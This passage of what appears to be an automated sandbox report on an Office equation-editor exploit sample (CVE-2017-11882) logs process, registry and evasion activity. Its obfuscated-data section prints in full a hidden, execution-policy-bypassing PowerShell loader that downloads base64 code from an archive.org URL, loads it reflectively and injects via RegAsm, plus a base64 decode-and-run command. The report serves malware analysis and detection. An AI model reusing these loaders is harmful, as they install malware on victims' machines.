                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32
                  Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.LNK.0.drLNK file: ..\..\..\..\..\Desktop\SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                  Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000008.00000002.385255527.00000000063D0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.383266190.0000000004289000.00000004.00000800.00020000.00000000.sdmp

                  Data Obfuscation

                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $pSHOmE[4]+$PSHOME[34]+'X')( ('HqRur'+'l '+'= '+'VUF'+'ht'+'t'+'ps://i'+'a6'+'00100.us.archive.or'+'g/'+'24/it'+'ems/d'+'e'+'ta'+'h-no'+'t'+'e-v/De'+'t'+'ahNote'+'V.txtVU'+'F'+';HqRba'+'se64'+'C'+'ontent = (New'+'-Obje'+'ct'+' Sys'+'tem'+'.N'+'e'+'t.We'+'b'+'C'+'li'+'e'+'nt'+')'+'.Downl'+'o'+'adS'+'tri'+'ng(HqRurl);HqRbi'+'naryContent = [S'+'ystem.C'+'o'+'n'+'vert]::FromBas'+'e64Stri'+'ng(HqRbase'+'64C'+'ont'+'ent);HqR'+'as'+'sembly'+' = [R'+'eflection.As'+'sem'+'bly]::Load(H'+'qRb'+'inar'+'yC'+'on'+'t'+'ent);'+'Hq'+'Rtype ='+' '+'H'+'qRasse'+'mbly.GetType(V'+'UFRun'+'P'+'E.'+'HomeVUF'+');H'+'qR'+'met'+'hod = HqRt'+'ype.GetMet'+'hod('+'VUFVA'+'IVUF);HqRmet'+'hod.Invoke(HqR'+'null'+', [object[]]@(VU'+'Ftxt.'+'VBGR/'+'05'+'5/2'+'5'+'.01.92.58'+'1//:'+'ptthVUF , '+'VUFd'+'esa'+'t'+'iv'+'ad'+'oVUF '+','+' VU'+'Fd'+'esati'+'v'+'ad'+'oV'+'UF'+' '+','+' V'+'UFde'+'s'+'ati'+'vadoVUF,'+'VUFRe'+'gAsmV'+'UF,VUFV'+'UF))').Replace(([cHAr]72+[cHAr]113+[cHAr]82),[StRIng][cHAr]36).Replace(([cHAr]86+[cHAr]85+[cHAr]70),[StRIng][cHAr]39) )"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,9_2_0041CBE1
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00564A6C push eax; ret 2_2_00564A6F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0054F927 push cs; retn 0000h2_2_0054F92D
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005635C6 push eax; ret 2_2_005635C7
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00564BF2 push eax; ret 2_2_00564BF3
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00558EE1 push eax; retf 2_2_00558F61
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00564BEA push eax; ret 2_2_00564BEB
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005635BE push eax; ret 2_2_005635BF
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00264A64 push esp; ret 8_2_00264A71
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00264AA8 push esp; ret 8_2_00264A71
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_002625E9 push ebx; retf 8_2_002625EA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00457186 push ecx; ret 9_2_00457199
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0045E55D push esi; ret 9_2_0045E566
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00457AA8 push eax; ret 9_2_00457AC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00434EB6 push ecx; ret 9_2_00434EC9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_10002806 push ecx; ret 9_2_10002819
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044693D push ecx; ret 13_2_0044694D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044DB70 push eax; ret 13_2_0044DB84
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0044DB70 push eax; ret 13_2_0044DBAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00451D54 push eax; ret 13_2_00451D61
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044B090 push eax; ret 14_2_0044B0A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0044B090 push eax; ret 14_2_0044B0CC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00451D34 push eax; ret 14_2_00451D41
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00444E71 push ecx; ret 14_2_00444E81
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00414060 push eax; ret 15_2_00414074
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00414060 push eax; ret 15_2_0041409C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00414039 push ecx; ret 15_2_00414049
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004164EB push 0000006Ah; retf 15_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00416553 push 0000006Ah; retf 15_2_004165C4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00416555 push 0000006Ah; retf 15_2_004165C4

                  Persistence and Installation Behavior

                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00406EEB ShellExecuteW,URLDownloadToFileW,9_2_00406EEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,9_2_0041AADB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,9_2_0041CBE1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_0040F7E2 Sleep,ExitProcess
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 9_2_0041A7D9 OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 600000
                  Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 588
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1283
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1417
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5199
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Window / User API: threadDelayed 415
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Window / User API: threadDelayed 9561
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) | graph_9-54170
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3376 | Thread sleep time: -180000s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3676 | Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3636 | Thread sleep time: -1844674407370954s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3708 | Thread sleep count: 1417 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3708 | Thread sleep count: 5199 > 30
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3756 | Thread sleep time: -60000s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3760 | Thread sleep time: -5534023222112862s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3760 | Thread sleep time: -4200000s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3760 | Thread sleep time: -600000s >= -30000s
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3692 | Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3808 | Thread sleep count: 415 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3808 | Thread sleep time: -1245000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3908 | Thread sleep time: -180000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3808 | Thread sleep count: 9561 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3808 | Thread sleep time: -28683000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4032 | Thread sleep time: -60000s >= -30000s
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 4084 | Thread sleep time: -60000s >= -30000s
